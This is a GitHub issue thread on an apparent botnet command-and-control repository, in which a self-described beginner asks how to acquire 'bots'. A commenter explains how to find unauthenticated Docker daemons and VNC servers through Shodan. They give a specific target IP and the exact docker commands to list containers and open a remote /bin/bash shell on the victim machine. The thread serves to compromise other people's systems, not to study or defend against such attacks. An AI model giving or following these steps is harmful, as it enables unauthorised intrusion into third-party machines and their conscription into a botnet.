### ISSUE TITLE
How to scan and load bots

### ISSUE THREAD

**Issue by skjose0705** [Hex1629/BotnetC2#9]
Can someone help me to scan and load bots?, I'm a beginner

**Comment by anonsecbotnetstudent123** [comment]
it can't scan. it is not qbot or mirai

**Comment by skjose0705** [comment]
Then how can I get bots?

**Comment by anonsecbotnetstudent123** [comment]
do you know shodan?

**Comment by anonsecbotnetstudent123** [comment]
i always find bots in this
example: docker image(docker -H ip ps -a)  or port:5900 authentication disacbled

**Comment by skjose0705** [comment]
Can you give me a example with a IP please bro?

**Comment by anonsecbotnetstudent123** [comment]
install docker ( apt install docker.io)
example ip: 120.27.236.5 (docker image)
list image ( docker -H 120.27.236.5 ps -a)
and docker -H 120.27.236.5 exec -it 4b6908aa8376 /bin/bash
you will access in /bin/bash in bot

**Comment by skjose0705** [comment]
Thanks bro :)
